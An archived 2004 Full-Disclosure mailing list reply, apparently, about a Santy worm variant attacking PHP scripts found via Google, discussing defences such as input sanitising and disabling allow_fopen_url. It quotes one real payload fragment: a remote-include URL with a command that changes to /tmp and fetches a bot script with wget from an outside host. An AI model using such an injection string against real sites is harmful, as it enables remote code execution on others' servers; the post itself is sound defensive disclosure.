Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts

from [Juergen Schmidt] Network Security [Permanent Link]
Subject: [Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts
Date: Sun, 26 Dec 2004 15:33:00 +0100 (CET) 
On Sat, 25 Dec 2004, Pekka Savola wrote:


On Sat, 25 Dec 2004, Juergen Schmidt wrote:

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...


And AFAICS, this can be prevented by setting register_globals=off in
php.ini.


Nope -- this only prevents internal variables from being modified by
attackers. As the variable is being listed in search engines, you want to
set them from external parameters. So you have to sanitize them.

Disabling allow_fopen_url protects you against this attack (not against
spying on local files though).

bye, ju

-- 
Juergen Schmidt       Chefredakteur  heise Security     www.heisec.de
Heise Zeitschriften Verlag,    Helstorferstr. 7,       D-30625 Hannover
Tel. +49 511 5352 300      FAX +49 511 5352 417       EMail ju@heisec.de
GPG-Key: 0x38EA4970,  5D7B 476D 84D5 94FF E7C5  67BE F895 0A18 38EA 4970
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts, Paul Laudanski
Next by Date:  [Full-Disclosure] (no subject), class 101
Previous by Thread:  New Santy-Worm attacks *all* PHP-skripts, Juergen Schmidt
Next by Thread:  Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? ), K-OTiK Security
Indexes:  [Date] [Thread] [Top] [All Lists]